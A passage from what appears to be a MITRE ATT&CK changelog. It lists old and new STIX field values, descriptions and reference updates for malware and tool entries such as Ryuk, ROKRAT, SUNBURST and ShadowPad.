| external_references[5]['url'] | https://www.group-ib.com/whitepapers/ransomware-uncovered.html | https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html |
| external_references[6]['source_name'] | Kaspersky Sodin July 2019 | Group IB Ransomware May 2020 |
| external_references[6]['description'] | Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020. | Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. |
| external_references[6]['url'] | https://securelist.com/sodin-ransomware/91473/ | https://www.group-ib.com/whitepapers/ransomware-uncovered.html |
| external_references[8]['source_name'] | Cylance Sodinokibi July 2019 | Intel 471 REvil March 2020 |
| external_references[8]['description'] | Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020. | Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. |
| external_references[8]['url'] | https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html | https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ |
| external_references[9]['source_name'] | Secureworks GandCrab and REvil September 2019 | Kaspersky Sodin July 2019 |
| external_references[9]['description'] | Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. | Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020. |
| external_references[9]['url'] | https://www.secureworks.com/blog/revil-the-gandcrab-connection | https://securelist.com/sodin-ransomware/91473/ |
| external_references[10]['source_name'] | Talos Sodinokibi April 2019 | McAfee Sodinokibi October 2019 |
| external_references[10]['description'] | Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. | McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. |
| external_references[10]['url'] | https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html | https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ |
| external_references[11]['source_name'] | McAfee Sodinokibi October 2019 | Picus Sodinokibi January 2020 |
| external_references[11]['description'] | McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. | Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020. |
| external_references[11]['url'] | https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ | https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware |
| external_references[13]['source_name'] | Picus Sodinokibi January 2020 | Secureworks GandCrab and REvil September 2019 |
| external_references[13]['description'] | Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020. | Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. |
| external_references[13]['url'] | https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware | https://www.secureworks.com/blog/revil-the-gandcrab-connection |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123) | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-23 18:54:49.190000+00:00 | 2022-03-30 20:40:21.212000+00:00 |
| description | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123) | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021) |
| external_references[4]['source_name'] | Talos ROKRAT 2 | Volexity InkySquid RokRAT August 2021 |
| external_references[4]['description'] | Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018. | Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021. |
| external_references[4]['url'] | https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html | https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/ |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos ROKRAT 2', 'description': 'Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html'} |
| Description |
|---|
| [RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-03 22:22:05.857000+00:00 | 2022-07-29 19:51:00.660000+00:00 |
| external_references[2]['source_name'] | ESET RTM Feb 2017 | Unit42 Redaman January 2019 |
| external_references[2]['description'] | Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. | Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. |
| external_references[2]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf | https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/ |
| external_references[3]['source_name'] | Unit42 Redaman January 2019 | ESET RTM Feb 2017 |
| external_references[3]['description'] | Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. | Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. |
| external_references[3]['url'] | https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/ | https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-04-19 19:04:55.892000+00:00 | 2022-07-28 18:55:35.991000+00:00 |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| Description |
|---|
| [Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg) Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 20:25:18.606000+00:00 | 2022-10-13 20:23:35.333000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:03:42.421000+00:00 | 2022-09-16 15:40:41.093000+00:00 |
| external_references[2]['source_name'] | Riskiq Remcos Jan 2018 | Fortinet Remcos Feb 2017 |
| external_references[2]['description'] | Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. | Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ | https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html |
| external_references[4]['source_name'] | Fortinet Remcos Feb 2017 | Riskiq Remcos Jan 2018 |
| external_references[4]['description'] | Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018. | Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. |
| external_references[4]['url'] | https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html | https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ |
| x_mitre_version | 1.1 | 1.3 |
| Description |
|---|
| Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ['Responder'] | |
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-04-06 14:42:53.334000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-30 03:13:38.515000+00:00 | 2022-10-13 15:46:29.677000+00:00 |
| description | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| [Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:31:22.741000+00:00 | 2022-05-24 21:10:44.381000+00:00 |
| external_references[2]['source_name'] | CrowdStrike Ryuk January 2019 | Bleeping Computer - Ryuk WoL |
| external_references[2]['description'] | Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. |
| external_references[2]['url'] | https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ |
| external_references[4]['source_name'] | FireEye FIN6 Apr 2019 | CrowdStrike Ryuk January 2019 |
| external_references[4]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ |
| external_references[5]['source_name'] | Bleeping Computer - Ryuk WoL | FireEye FIN6 Apr 2019 |
| external_references[5]['description'] | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[5]['url'] | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm) | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:28:45.114000+00:00 | 2022-09-30 20:10:08.347000+00:00 |
| description | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm) | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 20:35:47.468000+00:00 | 2022-07-18 16:01:14.539000+00:00 |
| external_references[1]['source_name'] | Proofpoint TA505 October 2019 | IBM TA505 April 2020 |
| external_references[1]['description'] | Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. |
| external_references[1]['url'] | https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ |
| external_references[2]['source_name'] | IBM TA505 April 2020 | Proofpoint TA505 October 2019 |
| external_references[2]['description'] | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. | Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. |
| external_references[2]['url'] | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ | https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:12:16.269000+00:00 | 2022-10-18 22:07:23.251000+00:00 |
| external_references[2]['source_name'] | FireEye Shining A Light on DARKSIDE May 2021 | FireEye SMOKEDHAM June 2021 |
| external_references[2]['description'] | FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021. | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html |
| external_references[3]['source_name'] | FireEye SMOKEDHAM June 2021 | FireEye Shining A Light on DARKSIDE May 2021 |
| external_references[3]['description'] | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. | FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html | https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 15:01:16.538000+00:00 | 2022-07-29 19:52:40.476000+00:00 |
| external_references[3]['source_name'] | SolarWinds Sunburst Sunspot Update January 2021 | FireEye SUNBURST Backdoor December 2020 |
| external_references[3]['description'] | Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021. | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. |
| external_references[3]['url'] | https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html |
| external_references[5]['source_name'] | FireEye SUNBURST Backdoor December 2020 | SolarWinds Sunburst Sunspot Update January 2021 |
| external_references[5]['description'] | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. | Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html | https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ |
| x_mitre_version | 2.1 | 2.3 |
| Old Description | New Description |
|---|---|
| [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution) | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 17:35:04.950000+00:00 | 2021-12-14 23:14:26.027000+00:00 |
| description | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution) | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution) |
| external_references[1]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| Description |
|---|
| [SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-15 15:17:10.012000+00:00 | 2022-10-21 15:16:57.038000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 13:14:35.741000+00:00 | 2022-10-17 19:31:36.083000+00:00 |
| external_references[2]['source_name'] | Recorded Future RedEcho Feb 2021 | FireEye APT41 Aug 2019 |
| external_references[2]['description'] | Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[2]['url'] | https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf | https://content.fireeye.com/apt-41/rpt-apt41 |
| external_references[4]['source_name'] | Kaspersky ShadowPad Aug 2017 | Recorded Future RedEcho Feb 2021 |
| external_references[4]['description'] | Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. | Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021. |
| external_references[4]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf | https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf |
| external_references[5]['source_name'] | FireEye APT41 Aug 2019 | Kaspersky ShadowPad Aug 2017 |
| external_references[5]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. |
| external_references[5]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
